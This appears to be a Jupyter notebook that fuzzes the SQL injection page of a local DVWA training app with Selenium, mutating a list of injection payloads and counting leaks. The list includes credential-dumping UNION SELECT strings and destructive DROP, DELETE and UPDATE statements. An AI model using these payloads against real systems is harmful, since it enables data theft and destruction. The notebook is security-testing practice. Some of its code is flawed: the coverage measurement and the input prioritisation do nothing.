In [ ]:
pip install selenium

In [ ]:
pip install coverage

In [ ]:
from selenium.common.exceptions import TimeoutException, NoSuchElementException
import coverage
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import Select
import random
import time
import string



driver = webdriver.Chrome(executable_path="C:\chromedriver_win32")
# Open DVWA in the browser
driver.get("http://localhost/Dvwa/login.php")

username_input = driver.find_element(By.NAME, "username")
password_input = driver.find_element(By.NAME, "password")

time.sleep(0)  # Wait for 2 seconds
username_input.send_keys("dvwa")
password_input.send_keys("p@ssw0rd")

time.sleep(0)  # Wait for 2 seconds
password_input.send_keys(Keys.RETURN)

# Navigate to the security page and set the security level to "Low"
driver.get("http://localhost/DVWA/security.php")
security_select = Select(driver.find_element(By.NAME, "security"))
security_select.select_by_value("low")
submit_button = driver.find_element(By.NAME, "seclev_submit")
submit_button.click()

# Navigate to the SQL Injection page
driver.get("http://localhost/DVWA/vulnerabilities/sqli/")
time.sleep(0)  # Wait for 2 seconds

# Find the input field and submit button
user_id_input = driver.find_element(By.NAME, "id")
user_id_input.clear()

# This is a dictionary which will hold our priorities
# Each time we receive an "unexpected" response from the server, we increase the priority of the respective input
priority_dict = {}

# Define our SQL injection patterns
sql_patterns = [
    "'",
    '"',
    'or 1=1',
    'admin\' --',
    'admin\'#',
    'admin\'/*',
    '0 or 1=1',
    'admin" --',
    'admin"#',
    'admin"/*',
    '1\' or \'1\' = \'1',
    '\'UNION SELECT user,password FROM users#',
    '1\' UNION SELECT NULL, CONCAT(user,0x3a,password) FROM users#',
    '\' OR EXISTS(SELECT * FROM users WHERE user=\'admin\' AND password LIKE \'%25\') --',
    '1\' or \'1\' = \'2',
    '\'UNION SELECT NULL, version() FROM users#',
    '1; DROP TABLE users--',
    'SELECT * FROM information_schema.tables',
    'DELETE FROM users WHERE 1=1',
    'UPDATE users SET password = \'hacked\' WHERE id = 1',
    'INSERT INTO users (username, password) VALUES (\'hacker\', \'password\')',
    'SELECT COUNT(*) FROM users',
    'SELECT * FROM users WHERE username = \'admin\'',
    'SELECT * FROM users WHERE 1=0',
    'SELECT * FROM users WHERE password LIKE \'%admin%\'',
    'SELECT * FROM users ORDER BY username ASC',
    'SELECT * FROM users ORDER BY username DESC',
    'SELECT * FROM users LIMIT 10',
    'SELECT * FROM users LIMIT 1 OFFSET 5',
    'SELECT * FROM users GROUP BY username',
    'SELECT * FROM users HAVING COUNT(*) > 1',
    'SELECT * FROM users UNION SELECT * FROM admin_users',
    'SELECT * FROM users INNER JOIN roles ON users.role_id = roles.id',
    'SELECT * FROM users LEFT JOIN roles ON users.role_id = roles.id',
    'SELECT * FROM users RIGHT JOIN roles ON users.role_id = roles.id',
    'SELECT * FROM users CROSS JOIN roles',
    'SELECT * FROM users WHERE id BETWEEN 1 AND 10',
    'SELECT * FROM users WHERE id NOT IN (1, 2, 3)',
    'SELECT * FROM users WHERE username IS NULL',
    'SELECT * FROM users WHERE username IS NOT NULL',
    'SELECT * FROM users WHERE password = MD5(\'password\')',
    'SELECT * FROM users WHERE password = SHA1(\'password\')',
    'SELECT * FROM users WHERE password = \'password\' OR 1=1',
    'SELECT * FROM users WHERE password = \'password\' AND 1=0',
    'SELECT * FROM users WHERE password LIKE \'%password%\'',
    'SELECT * FROM users WHERE username LIKE \'%admin%\' AND password = \'password\'',
    'SELECT * FROM users WHERE username REGEXP \'^[A-Za-z]+$\'',
    'SELECT * FROM users WHERE username REGEXP \'^[0-9]+$\'',
    'SELECT * FROM users WHERE SUBSTRING(username, 1, 1) = \'A\'',
    'SELECT * FROM users WHERE LENGTH(username) > 5',
]



# Initialize coverage measurement
cov = coverage.Coverage(source=["http://localhost/Dvwa/vulnerabilities/view_source.php?id=sqli&security=low"])
cov.start()


# Initialize our dictionary with equal priorities for all inputs
for pattern in sql_patterns:
    priority_dict[pattern] = 1

#check for priority
def update_priority(input, response):
    global priority_dict
    if len(response) > 1 or len(response) == 0:
        if input not in priority_dict:
            priority_dict[input] = 1
        else:
            priority_dict[input] += 1


def delete_random_character(s):
    if s:
        random_index = random.randint(0, len(s) - 1)
        return s[:random_index] + s[random_index + 1:]
    return s

def insert_random_character(s):
    random_index = random.randint(0, len(s))
    random_character = random.choice(string.ascii_letters + string.digits)
    return s[:random_index] + random_character + s[random_index:]

def change_random_character(s):
    if s:
        random_index = random.randint(0, len(s) - 1)
        random_character = random.choice(string.ascii_letters + string.digits)
        return s[:random_index] + random_character + s[random_index + 1:]
    return s
            
     
# Counters for crashes and data breaches
total_crashes = 0
total_data_breaches = 0

# Create a dictionary to store input coverage
input_coverage = {pattern: False for pattern in sql_patterns}


# Run multiple cycles of input generation and submission
for cycle in range(100):
    start_time = time.time()

    # Generate random input
    #random_input = random.choice(sql_patterns)
    
    mutation_functions = [delete_random_character, insert_random_character, change_random_character]

    # Generate random input
    if random.random() < 0.5:
        # Select the exact query
        random_input = random.choice(sql_patterns)
        input_coverage[random_input] = True
    else:
        # Select a mutated input using one of the mutation functions
        mutation_function = random.choice(mutation_functions)
        base_input = random.choice(sql_patterns)
        random_input = mutation_function(base_input)
        input_coverage[random_input] = True
    
    
    #random_input = "1' or '1' = '1"
    print(f"Cycle {cycle + 1}: Input = {random_input}")

    try:
        # Enter the random input into the User ID field
        user_id_input = driver.find_element(By.NAME, "id")
        user_id_input.clear()
        user_id_input.send_keys(random_input)
        user_id_input.send_keys(Keys.RETURN)
        #time.sleep(1)  # Add a delay here

        wait = WebDriverWait(driver, 0)  # Adjust the waiting time if necessary
    
        output_element = None
        try:
            #time.sleep(2)  # Add a delay here
            output_element = WebDriverWait(driver, 1).until(
                EC.visibility_of_all_elements_located((By.CSS_SELECTOR, "pre")))
            
        except TimeoutException:
            pass

        if output_element is None:
            print(f"Cycle {cycle + 1}: Unexpected output - Output is empty")
        else:
            #output_text = output_element.text.lower()
            # Check if multiple IDs are present, which indicates a data breach
            if len(output_element) > 1:
                print(f"Cycle {cycle + 1}: Data Breach Detected")
                total_data_breaches += 1
            else:
                print(f"Cycle {cycle + 1}: Output seems normal")

    except NoSuchElementException:
        print(f"Cycle {cycle + 1}: Crash happened - Unable to locate element")
        # Increment the crash counter
        total_crashes += 1
        # Navigate back to the SQL Injection page
        driver.get("http://localhost/DVWA/vulnerabilities/sqli/")
        continue
    
    if output_element is not None:
        update_priority(random_input, output_element)

    # Now we need to sort our dictionary based on values
    # For the next iterations, the inputs which lead to "unexpected" results will be given higher priority and be tested more frequently.
    priority_dict = {k: v for k, v in sorted(priority_dict.items(), key=lambda item: item[1], reverse=True)}

    # Calculate and display the time taken for the current cycle
    end_time = time.time()
    time_taken = end_time - start_time
    print(f"Cycle {cycle + 1}: Time taken = {time_taken} seconds\n")
    #print("output Text:", output_text)
    #print(type(output_text))


    
    
# Here, after all the test cases are run, stop the coverage measurement and save the results
cov.stop()
cov.save()
# Generate the coverage report
cov.report()
cov.html_report(directory="coverage_report")

# After the loop ends, print the total counts
print(f"Total Number of Crashes: {total_crashes}")
print(f"Total Number of Data Breaches: {total_data_breaches}")
crash_rate = total_crashes / cycle
print(f"Crash Rate: {crash_rate}")
# Calculate input coverage
covered_inputs = sum(1 for covered in input_coverage.values() if covered)
total_inputs = len(input_coverage)
coverage_ratio = covered_inputs / total_inputs
print(f"Input Coverage: {coverage_ratio * 100}%")


# Close the browser
#driver.quit()
